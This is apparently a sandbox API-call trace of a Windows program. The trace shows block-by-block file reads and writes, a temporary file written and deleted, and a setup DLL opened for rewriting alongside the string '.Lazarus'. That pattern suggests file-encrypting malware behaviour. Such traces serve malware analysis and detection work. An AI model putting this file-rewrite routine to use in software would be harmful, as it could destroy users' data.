1 [0066.863] WriteFile (in: hFile=0x420, lpBuffer=0x85fc0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x85fc0*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0066.864] GetLastError () returned 0x0 [0066.864] SetLastError (dwErrCode=0x0) [0066.864] GetLastError () returned 0x0 [0066.864] SetLastError (dwErrCode=0x0) [0066.864] GetLastError () returned 0x0 [0066.864] SetLastError (dwErrCode=0x0) [0066.864] GetLastError () returned 0x0 [0066.864] SetLastError (dwErrCode=0x0) [0066.864] ReadFile (in: hFile=0x428, lpBuffer=0x84fb8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x84fb8*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0066.864] WriteFile (in: hFile=0x420, lpBuffer=0x85fc0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x85fc0*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0066.864] GetLastError () returned 0x0 [0066.864] SetLastError (dwErrCode=0x0) [0066.865] GetLastError () returned 0x0 [0066.865] SetLastError (dwErrCode=0x0) [0066.865] GetLastError () returned 0x0 [0066.865] SetLastError (dwErrCode=0x0) [0066.865] GetLastError () returned 0x0 [0066.865] SetLastError (dwErrCode=0x0) [0066.865] ReadFile (in: hFile=0x428, lpBuffer=0x84fb8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x84fb8*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0066.865] WriteFile (in: hFile=0x420, lpBuffer=0x85fc0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x85fc0*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0066.865] GetLastError () returned 0x0 [0066.865] SetLastError (dwErrCode=0x0) [0066.865] GetLastError () returned 0x0 [0066.865] SetLastError (dwErrCode=0x0) [0066.865] GetLastError () returned 0x0 [0066.866] SetLastError (dwErrCode=0x0) [0066.866] GetLastError () returned 0x0 [0066.866] SetLastError (dwErrCode=0x0) [0066.866] ReadFile (in: hFile=0x428, lpBuffer=0x84fb8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x84fb8*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0066.866] WriteFile (in: hFile=0x420, lpBuffer=0x85fc0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x85fc0*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0066.866] GetLastError () returned 0x0 [0066.866] SetLastError (dwErrCode=0x0) [0066.866] GetLastError () returned 0x0 [0066.866] SetLastError (dwErrCode=0x0) [0066.866] GetLastError () returned 0x0 [0066.866] SetLastError (dwErrCode=0x0) [0066.867] GetLastError () returned 0x0 [0066.867] SetLastError (dwErrCode=0x0) [0066.867] ReadFile (in: hFile=0x428, lpBuffer=0x84fb8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x84fb8*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0066.867] WriteFile (in: hFile=0x420, lpBuffer=0x85fc0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x85fc0*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0066.867] GetLastError () returned 0x0 [0066.867] SetLastError (dwErrCode=0x0) [0066.867] GetLastError () returned 0x0 [0066.867] SetLastError (dwErrCode=0x0) [0066.867] GetLastError () returned 0x0 [0066.867] SetLastError (dwErrCode=0x0) [0066.867] GetLastError () returned 0x0 [0066.867] SetLastError (dwErrCode=0x0) [0066.868] ReadFile (in: hFile=0x428, lpBuffer=0x84fb8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x84fb8*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0066.868] WriteFile (in: hFile=0x420, lpBuffer=0x85fc0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x85fc0*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0066.868] GetLastError () returned 0x0 [0066.868] SetLastError (dwErrCode=0x0) [0066.868] GetLastError () returned 0x0 [0066.868] SetLastError (dwErrCode=0x0) [0066.868] GetLastError () returned 0x0 [0066.868] SetLastError (dwErrCode=0x0) [0066.868] GetLastError () returned 0x0 [0066.868] SetLastError (dwErrCode=0x0) [0066.868] ReadFile (in: hFile=0x428, lpBuffer=0x84fb8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x84fb8*, lpNumberOfBytesRead=0x327f0c4*=0x98c, lpOverlapped=0x0) returned 1 [0066.869] WriteFile (in: hFile=0x420, lpBuffer=0x85fc0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x85fc0*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0066.869] GetLastError () returned 0x0 [0066.869] SetLastError (dwErrCode=0x0) [0066.869] GetLastError () returned 0x0 [0066.869] SetLastError (dwErrCode=0x0) [0066.869] ReadFile (in: hFile=0x428, lpBuffer=0x84fb8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x84fb8*, lpNumberOfBytesRead=0x327f0c4*=0x0, lpOverlapped=0x0) returned 1 [0066.869] GetLastError () returned 0x0 [0066.869] SetLastError (dwErrCode=0x0) [0066.869] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xc) returned 0x7d5a0 [0066.869] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d5b8 [0066.869] GetLastError () returned 0x0 [0066.869] SetLastError (dwErrCode=0x0) [0066.869] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d588 | out: hHeap=0x20000) returned 1 [0066.870] WriteFile (in: hFile=0x420, lpBuffer=0x85fc0*, nNumberOfBytesToWrite=0x990, lpNumberOfBytesWritten=0x327ef70, lpOverlapped=0x0 | out: lpBuffer=0x85fc0*, lpNumberOfBytesWritten=0x327ef70*=0x990, lpOverlapped=0x0) returned 1 [0066.870] GetLastError () returned 0x0 [0066.870] SetLastError (dwErrCode=0x0) [0066.870] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d5a0 | out: hHeap=0x20000) returned 1 [0066.870] GetLastError () returned 0x0 [0066.870] SetLastError (dwErrCode=0x0) [0066.870] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f028 | out: hHeap=0x20000) returned 1 [0066.870] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x70718 | out: hHeap=0x20000) returned 1 [0066.870] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d5b8 | out: hHeap=0x20000) returned 1 [0066.870] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f6a8 | out: hHeap=0x20000) returned 1 [0066.870] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a4b0 | out: hHeap=0x20000) returned 1 [0066.870] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x85fc0 | out: hHeap=0x20000) returned 1 [0066.870] CloseHandle (hObject=0x420) returned 1 [0066.873] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x84fb8 | out: hHeap=0x20000) returned 1 [0066.873] CloseHandle (hObject=0x428) returned 1 [0066.873] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfc0 [0066.873] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d080 [0066.873] AreFileApisANSI () returned 1 [0066.873] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4df88, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 45 [0066.873] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5a) returned 0x71758 [0066.873] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4df88, cbMultiByte=-1, lpWideCharStr=0x71758, cchWideChar=45 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1037\\LocalizedData.xml") returned 45 [0066.873] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1037\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1037\\localizeddata.xml"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x327f170, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0066.962] GetFileType (hFile=0x428) returned 0x1 [0066.962] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71758 | out: hHeap=0x20000) returned 1 [0066.963] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x84fb8 [0066.963] GetLastError () returned 0xb7 [0066.963] SetLastError (dwErrCode=0xb7) [0066.963] WriteFile (in: hFile=0x428, lpBuffer=0x327de50*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x327de4c, lpOverlapped=0x0 | out: lpBuffer=0x327de50*, lpNumberOfBytesWritten=0x327de4c*=0x1, lpOverlapped=0x0) returned 1 [0066.964] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x84fb8 | out: hHeap=0x20000) returned 1 [0066.964] CloseHandle (hObject=0x428) returned 1 [0066.964] AreFileApisANSI () returned 1 [0066.964] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4df88, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 45 [0066.964] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5a) returned 0x71758 [0066.964] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4df88, cbMultiByte=-1, lpWideCharStr=0x71758, cchWideChar=45 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1037\\LocalizedData.xml") returned 45 [0066.964] DeleteFileW (lpFileName="C:\\588bce7c90097ed212\\1037\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1037\\localizeddata.xml")) returned 1 [0066.965] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71758 | out: hHeap=0x20000) returned 1 [0066.965] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d080 | out: hHeap=0x20000) returned 1 [0066.965] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0066.965] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfb0 | out: hHeap=0x20000) returned 1 [0066.965] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0066.965] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0066.965] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0066.965] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5e570 | out: hHeap=0x20000) returned 1 [0066.965] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d660 | out: hHeap=0x20000) returned 1 [0066.965] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d540 | out: hHeap=0x20000) returned 1 [0066.965] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8c430 | out: hHeap=0x20000) returned 1 [0066.965] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8c288 | out: hHeap=0x20000) returned 1 [0066.965] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df88 | out: hHeap=0x20000) returned 1 [0066.965] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88518 | out: hHeap=0x20000) returned 1 [0066.965] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88388 | out: hHeap=0x20000) returned 1 [0066.965] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0066.965] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfe0 | out: hHeap=0x20000) returned 1 [0066.965] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e2d0 | out: hHeap=0x20000) returned 1 [0066.965] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0066.966] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0066.966] FindNextFileW (in: hFindFile=0x78710, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4158, dwReserved0=0x1, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 1 [0066.966] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88630 [0066.966] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de70 [0066.966] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88630 | out: hHeap=0x20000) returned 1 [0066.966] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e030 [0066.966] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e3e8 [0066.966] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e420 [0066.966] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e3e8 | out: hHeap=0x20000) returned 1 [0066.966] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e030 | out: hHeap=0x20000) returned 1 [0066.966] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de70 | out: hHeap=0x20000) returned 1 [0066.966] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e420 | out: hHeap=0x20000) returned 1 [0066.966] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cee0 [0066.966] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f6a8 [0066.966] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0066.966] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f6a8 | out: hHeap=0x20000) returned 1 [0066.966] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d000 [0066.966] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f6a8 [0066.966] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0066.966] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f6a8 | out: hHeap=0x20000) returned 1 [0066.966] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e068 [0066.966] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53640 [0066.966] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0a0 [0066.966] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x715b8 [0066.966] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53640 | out: hHeap=0x20000) returned 1 [0066.966] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0a0 | out: hHeap=0x20000) returned 1 [0066.966] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71bd0 [0066.966] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x715b8 | out: hHeap=0x20000) returned 1 [0066.966] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0066.966] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0066.966] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0066.966] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0066.966] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71bd0 | out: hHeap=0x20000) returned 1 [0066.966] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e068 | out: hHeap=0x20000) returned 1 [0066.966] AreFileApisANSI () returned 1 [0066.966] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\588bce7c90097ed212\\1037\\SetupResources.dll", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\588bce7c90097ed212\\1037\\SetupResources.dll", lpUsedDefaultChar=0x0) returned 46 [0066.966] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e3e8 [0066.967] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0066.967] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0066.967] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf10 [0066.967] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf00 [0066.967] AreFileApisANSI () returned 1 [0066.967] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e3e8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 46 [0066.967] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5c) returned 0x719c8 [0066.967] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e3e8, cbMultiByte=-1, lpWideCharStr=0x719c8, cchWideChar=46 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1037\\SetupResources.dll") returned 46 [0066.967] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1037\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1037\\setupresources.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0066.967] GetFileType (hFile=0x428) returned 0x1 [0066.967] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x719c8 | out: hHeap=0x20000) returned 1 [0066.967] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0066.967] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0066.968] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0066.968] CloseHandle (hObject=0x428) returned 1 [0066.968] AreFileApisANSI () returned 1 [0066.968] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e3e8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 46 [0066.968] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5c) returned 0x71758 [0066.968] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e3e8, cbMultiByte=-1, lpWideCharStr=0x71758, cchWideChar=46 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1037\\SetupResources.dll") returned 46 [0066.968] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1037\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1037\\setupresources.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0066.968] GetFileType (hFile=0x428) returned 0x1 [0066.968] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71758 | out: hHeap=0x20000) returned 1 [0066.968] CloseHandle (hObject=0x428) returned 1 [0066.968] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e068 [0066.968] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de70 [0066.968] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e420 [0066.969] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e1b8 [0066.969] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e420 | out: hHeap=0x20000) returned 1 [0066.969] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de70 | out: hHeap=0x20000) returned 1 [0066.969] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e068 | out: hHeap=0x20000) returned 1 [0066.969] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e1b8 | out: hHeap=0x20000) returned 1 [0066.969] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de70 [0066.969] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e1f0 [0066.969] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e420 [0066.969] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e030 [0066.969] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e420 | out: hHeap=0x20000) returned 1 [0066.969] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e1f0 | out: hHeap=0x20000) returned 1 [0066.969] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de70 | out: hHeap=0x20000) returned 1 [0066.969] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e030 | out: hHeap=0x20000) returned 1 [0066.969] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dff8 [0066.969] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0066.969] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0a0 [0066.969] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e1f0 [0066.969] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0a0 | out: hHeap=0x20000) returned 1 [0066.969] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0066.969] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dff8 | out: hHeap=0x20000) returned 1 [0066.969] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e420 [0066.969] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e1f0 | out: hHeap=0x20000) returned 1 [0066.969] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de70 [0066.969] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e420 | out: hHeap=0x20000) returned 1 [0066.969] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de70 | out: hHeap=0x20000) returned 1 [0066.969] AreFileApisANSI () returned 1 [0066.969] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e3e8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 46 [0066.969] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5c) returned 0x71b00 [0066.969] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e3e8, cbMultiByte=-1, lpWideCharStr=0x71b00, cchWideChar=46 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1037\\SetupResources.dll") returned 46 [0066.969] GetFileAttributesExW (in: lpFileName="C:\\588bce7c90097ed212\\1037\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1037\\setupresources.dll"), fInfoLevelId=0x0, lpFileInformation=0x327f738 | out: lpFileInformation=0x327f738*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4158)) returned 1 [0066.969] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71b00 | out: hHeap=0x20000) returned 1 [0066.969] AreFileApisANSI () returned 1 [0066.969] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x327f560, cbMultiByte=-1, lpWideCharStr=0x327f578, cchWideChar=260 | out: lpWideCharStr=".Lazarus") returned 9 [0066.969] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0066.969] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0066.969] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0066.970] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0066.970] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0066.970] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0066.970] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0066.970] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0066.970] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e298 [0066.970] GetLastError () returned 0x0 [0066.970] SetLastError (dwErrCode=0x0) [0066.970] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x2c) returned 0x4df50 [0066.970] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x120c) returned 0x8c430 [0066.970] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x103) returned 0x8b450 [0066.970] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d798 [0066.970] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d7b0 [0066.970] GetLastError () returned 0x0 [0066.970] SetLastError (dwErrCode=0x0) [0066.970] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0066.970] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53298 